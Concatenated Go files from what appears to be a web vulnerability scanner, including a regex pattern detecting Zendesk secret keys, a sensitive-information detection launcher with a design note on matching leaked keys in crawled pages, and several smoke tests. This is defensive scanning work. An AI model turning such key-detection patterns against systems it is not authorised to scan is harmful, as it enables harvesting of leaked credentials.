          - (?i)(?:zendesk)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$)

# digest: 4a0a00473045022100ee6bae1cf90faa1beeae922204d58b2300e6ca7bf92065cb8a8402c597a1739002202c8bb2ae82d2e6c109dce0cce6fcb9d17f9f2977b098e1710dbdb8aafd92b8cd:922c64590222798bb761d5b6d8e72950

--------------------------------------------------------------------------------
/scan/gadget/sensitive/sensitive.go:
--------------------------------------------------------------------------------
package sensitive

/**
  @author: yhy
  @since: 2023/10/18
  @desc: //TODO
**/

// Detection starts the sensitive-information checks for one page.
//
// It launches KeyDetection(url, body), PageErrorMessageCheck(url, req, body)
// and Wih(url, req, body), each in its own goroutine, and returns at once.
// Nothing is returned to the caller and nothing here waits for the checks to
// finish, so a caller that needs their results before exiting has to
// synchronise by other means.
func Detection(url, req, body string) {
	checks := []func(){
		func() { KeyDetection(url, body) },
		func() { PageErrorMessageCheck(url, req, body) },
		func() { Wih(url, req, body) },
	}
	for _, check := range checks {
		go check()
	}
}
--------------------------------------------------------------------------------
/scan/gadget/sensitive/sensitive.md:
--------------------------------------------------------------------------------
## 敏感信息检测

~~使用[secrets-patterns-db](https://github.com/mazen160/secrets-patterns-db/)规则~~

误报过多,使用 nuclei[https://github.com/projectdiscovery/nuclei-templates/tree/main/file/keys] ,从中提取相关正则

检测流程
```bash
无头浏览器爬虫扫描获取body -> 使用规则正则匹配
```

## TODO
上报过多,需要优化
--------------------------------------------------------------------------------
/scan/gadget/swagger/swagger_test.go:
--------------------------------------------------------------------------------
package swagger

import (
	"fmt"
	"github.com/yhy0/Jie/pkg/output"
	"sync"
	"testing"
)

/**
  @author: yhy
  @since: 2023/1/4
  @desc: //TODO
**/

// TestSwagger runs Scan with an empty target and an empty path and prints
// whatever arrives on output.OutChannel. It asserts nothing.
//
// NOTE(review): the sync.WaitGroup was meant to keep results in OutChannel
// from being dropped before they are consumed, but the consumer calls
// wg.Done() before it starts reading, so wg.Wait() only confirms that the
// goroutine has started. Results still queued when the test returns may never
// be printed. Waiting for the drain would need a point at which OutChannel is
// closed, and that is not visible in this file.
func TestSwagger(t *testing.T) {
	var wg sync.WaitGroup
	wg.Add(1)

	printResults := func() {
		wg.Done()
		for v := range output.OutChannel {
			fmt.Println(v.PrintScreen())
		}
	}
	go printResults()

	Scan("", "")

	wg.Wait()
}

--------------------------------------------------------------------------------
/scan/type.go:
--------------------------------------------------------------------------------
package scan

import (
	"github.com/yhy0/Jie/pkg/input"
	"github.com/yhy0/Jie/pkg/protocols/httpx"
)

/**
  @author yhy
  @since 2023/10/13
  @desc //TODO
**/

// Addon is the interface every scan plugin implements.
type Addon interface {
	// Scan runs the plugin. target and path are passed in on their own rather
	// than being read from in, so the URL held in in does not have to be
	// rewritten, which led to errors.
	Scan(target, path string, in *input.CrawlResult, client *httpx.Client)
	// IsScanned reports whether uniqueId has already been scanned.
	IsScanned(uniqueId string) bool
	// Name returns the plugin name.
	Name() string
}

--------------------------------------------------------------------------------
/test/cdncheck_test.go:
--------------------------------------------------------------------------------
package test

import (
	"fmt"
	"github.com/yhy0/Jie/pkg/util"
	"testing"
)

// TestCDNCheckValid calls util.CheckCdn once with an IP address and once with
// a host name and prints the four values it returns.
//
// The test asserts nothing, so it passes whatever CheckCdn reports; it is a
// manual smoke check rather than a regression test.
// NOTE(review): the host-name case presumably needs live DNS; confirm before
// running it in an offline CI job.
func TestCDNCheckValid(t *testing.T) {
	targets := []string{"173.245.48.12", "www.baidu.com"}

	for i, target := range targets {
		// A divider is printed between the two result groups, not before the first.
		if i > 0 {
			fmt.Println("=================")
		}

		found, provider, itemType, dnsData := util.CheckCdn(target)

		fmt.Println(found)
		fmt.Println(provider)
		fmt.Println(itemType)
		if dnsData != nil {
			fmt.Println(dnsData.A)
		}
	}
}

--------------------------------------------------------------------------------
/test/crawler_test.go:
--------------------------------------------------------------------------------
package test

import (
	"testing"
)

/**
  @author yhy
  @since 2023/8/22
  @desc //TODO
**/

// TestCrawler is an empty placeholder; it exercises no crawler code yet.
func TestCrawler(t *testing.T) {

}

--------------------------------------------------------------------------------
/test/jsluice_test.go:
--------------------------------------------------------------------------------
package test

import (
	"encoding/json"
	"fmt"
	"github.com/BishopFox/jsluice"
	"testing"
)

/**
  @author yhy
  @since 2023/12/26
  @desc //TODO
**/

// TestJsluice feeds jsluice a small JavaScript snippet that builds a login
// redirect URL by string concatenation, then prints every URL the analyzer
// reports, first as the plain URL and then as indented JSON.
//
// The test asserts nothing. A URL whose JSON encoding fails is skipped without
// any message, so an encoding problem would not make the test fail.
func TestJsluice(t *testing.T) {
	src := []byte(`
        const login = (redirect) => {
            document.location = "/login?redirect=" + redirect + "&method=oauth"
        }
    `)
	analyzer := jsluice.NewAnalyzer(src)

	for _, u := range analyzer.GetURLs() {
		fmt.Println(u.URL)

		encoded, err := json.MarshalIndent(u, "", " ")
		if err == nil {
			fmt.Printf("%s\n", encoded)
		}
	}
}

--------------------------------------------------------------------------------